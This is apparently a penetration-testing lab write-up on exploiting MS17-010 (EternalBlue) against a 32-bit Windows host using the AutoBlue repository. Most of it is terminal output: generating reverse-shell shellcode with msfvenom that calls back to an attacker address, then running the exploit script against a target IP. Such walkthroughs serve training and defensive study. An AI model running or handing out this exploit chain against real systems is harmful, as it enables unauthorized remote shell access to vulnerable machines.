# Exploitation

{% embed url="<https://github.com/3ndG4me/AutoBlue-MS17-010>" %}

{% embed url="<https://www.youtube.com/watch?v=_uLJB_Ys120>" %}
Good Tutorial
{% endembed %}

This is without metasploit because anyways the Metasploit Module only supports 64-bit systems. We got a Windows 7 SP1 32-bit Based system.&#x20;

Steps:

After cloning the github repo, go to the shellcode direcotry and generate the shellcode.

```
╭─      /home/k/I/r/192.168.100.40/exploit/AutoBlue-MS17-010/shellcode     master ?1 ▓▒░──░▒▓ ✔  root@kali 
╰─ ./shell_prep.sh          
                 _.-;;-._
          '-..-'|   ||   |
          '-..-'|_.-;;-._|
          '-..-'|   ||   |
          '-..-'|_.-''-._|   
Eternal Blue Windows Shellcode Compiler

Let's compile them windoos shellcodezzz

Compiling x64 kernel shellcode
Compiling x86 kernel shellcode
kernel shellcode compiled, would you like to auto generate a reverse shell with msfvenom? (Y/n)
y
LHOST for reverse connection:
192.168.49.227
LPORT you want x64 to listen on:
80
LPORT you want x86 to listen on:
80
Type 0 to generate a meterpreter shell or 1 to generate a regular cmd shell
1
Type 0 to generate a staged payload or 1 to generate a stageless payload
1
Generating x64 cmd shell (stageless)...

msfvenom -p windows/x64/shell_reverse_tcp -f raw -o sc_x64_msf.bin EXITFUNC=thread LHOST=192.168.49.227 LPORT=80
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Saved as: sc_x64_msf.bin

Generating x86 cmd shell (stageless)...

msfvenom -p windows/shell_reverse_tcp -f raw -o sc_x86_msf.bin EXITFUNC=thread LHOST=192.168.49.227 LPORT=80
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Saved as: sc_x86_msf.bin

MERGING SHELLCODE WOOOO!!!
DONE
```

Notice the different shellcode generated.

```
ls
eternalblue_kshellcode_x64.asm  sc_all.bin         sc_x64_msf.bin     sc_x86_msf.bin
eternalblue_kshellcode_x86.asm  sc_x64.bin         sc_x86.bin         shell_prep.sh
eternalblue_sc_merge.py         sc_x64_kernel.bin  sc_x86_kernel.bin
```

The one we need is either&#x20;

sc*x86.bin or sc\_x86\_msf.bin*&#x20;

Depending on whether we want to listen on the multi/handler or simple netcat. In my case I ran the exploit with the sc\_x86.bin shellcode because I was only looking to use netcat to listen.&#x20;

```
python3 eternalblue_exploit7.py 192.168.227.40 shellcode/sc_x86.bin
shellcode size: 962
numGroomConn: 13
Target OS: Windows Server (R) 2008 Standard 6001 Service Pack 1
SMB1 session setup allocate nonpaged pool success
SMB1 session setup allocate nonpaged pool success
good response status: INVALID_PARAMETER
done
```

![](https://607280274-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FW4W90VbfwmNDIWm2WPEp%2Fuploads%2FWNzUBdhYKb21y8Kacu1Q%2F2022-07-20_12-20.png?alt=media\&token=32a6b7d9-c624-4ae5-a00b-cfa20bc26f7d)